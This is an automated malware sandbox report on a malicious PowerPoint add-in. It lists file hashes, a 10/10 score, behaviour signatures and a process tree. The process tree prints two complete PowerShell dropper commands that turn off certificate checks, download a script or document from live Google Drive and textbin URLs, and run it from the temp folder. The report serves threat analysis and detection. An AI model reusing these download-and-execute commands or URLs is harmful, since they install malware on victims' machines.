Overview

overview

10

Static

static

1

3863c533a8...f.ppam

windows7-x64

10

3863c533a8...f.ppam

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    26-11-2024 16:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3863c533a821c836f236edf3d35a278ccf7d00ec1b5087cb662e8aa7ddb7e54f.ppam

  • Size

    7KB

  • MD5

    9fb59ca8e5dbe7036ad7bd3e0d64dc46

  • SHA1

    e63989b5046883141c1b5c80ed9dfe12f5146531

  • SHA256

    3863c533a821c836f236edf3d35a278ccf7d00ec1b5087cb662e8aa7ddb7e54f

  • SHA512

    8ec8ac5cad6a52bc6f11d56f1f276cb187edcdcf90c65cac28b8610549f54b193e957448b5633d0babb06b654c8e35508fb98ed9aaaf37f2ccb06d3600ae4d27

  • SSDEEP

    192:xrXP/xbajZ8EPm/QUN0iIZU0pU3pWBg6HoqBT02:dXP4ruWnK3pWWsLBT7

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=15ocCLsR2ZmidPwSBKFMdpMbEhO5YtYQ4

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://pt.textbin.net/download/x7sf6t2dgv

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\3863c533a821c836f236edf3d35a278ccf7d00ec1b5087cb662e8aa7ddb7e54f.ppam"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:2004
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2260
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command $UmniN;[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$uNTnd = (New-Object Net.WebClient) ;$uNTnd.Encoding = [System.Text.Encoding]::UTF8 ;$UmniN = $uNTnd.DownloadString( 'https://pt.textbin.net/download/x7sf6t2dgv' ) ;$uNTnd = $uNTnd.DownloadString( $UmniN ) ;$x = [System.IO.Path]::GetTempPath() ;Set-Location $x ;$uNTnd | Out-File -FilePath x.js -force ;wscript.exe x.js ; exit
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2896
        • C:\Windows\SysWOW64\wscript.exe
          "C:\Windows\system32\wscript.exe" x.js
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2492
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$uNTnd = (New-Object Net.WebClient) ;$uNTnd.Encoding = [System.Text.Encoding]::UTF8 ;$uNTnd.DownloadFile( 'https://drive.google.com/uc?export=download&id=15ocCLsR2ZmidPwSBKFMdpMbEhO5YtYQ4', [System.IO.Path]::GetTempPath() + 'x.pptx' ) ;$x = [System.IO.Path]::GetTempPath() ;Set-Location $x ;start x.pptx ; exit
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2136

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\x.js
      Filesize

      796B

      MD5

      b75621ae1faee608b4ed39e971d709a5

      SHA1

      bcd528eb22d2e7b1d11c9b603df87cec37d23da5

      SHA256

      54ce5e89f7c67db8cef4954d8f041857474882dc6af675b4120833bb8832a3a5

      SHA512

      5ef0841caeae364fee32cdd561c7473c45244009ae6dc73f38eefffdb1e95f7cb6f0531ef5d273ca7dd28f408c40a93a3de3c619dab41a0953ab731167ec0e66

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      Filesize

      7KB

      MD5

      92b53c45a04e893646ca8ed5297e40ee

      SHA1

      9bde835d0298bce52cc508fb6d1d6f49748ac550

      SHA256

      f4864e33bbe2b48fa7e696513d3a120b76c6defed8de33764c71c97719d06f70

      SHA512

      bc988a1a07068ae36b7baddb9ed50f7be0c139df0ebcb6775cb24ca6010d1d0a93fd24ef1040aee1e42914f85b55a475e64e94b2e7d61470fd82473c9b2183ec

      Download Submit

    • memory/2004-0-0x000000002D4F1000-0x000000002D4F2000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2004-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2004-2-0x0000000072C3D000-0x0000000072C48000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2004-10-0x0000000005260000-0x0000000005360000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2004-7-0x0000000005260000-0x0000000005360000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2004-21-0x0000000072C3D000-0x0000000072C48000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2004-22-0x0000000005260000-0x0000000005360000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2136-20-0x00000000064F0000-0x0000000006FAA000-memory.dmp

      Filesize

      10.7MB

      Download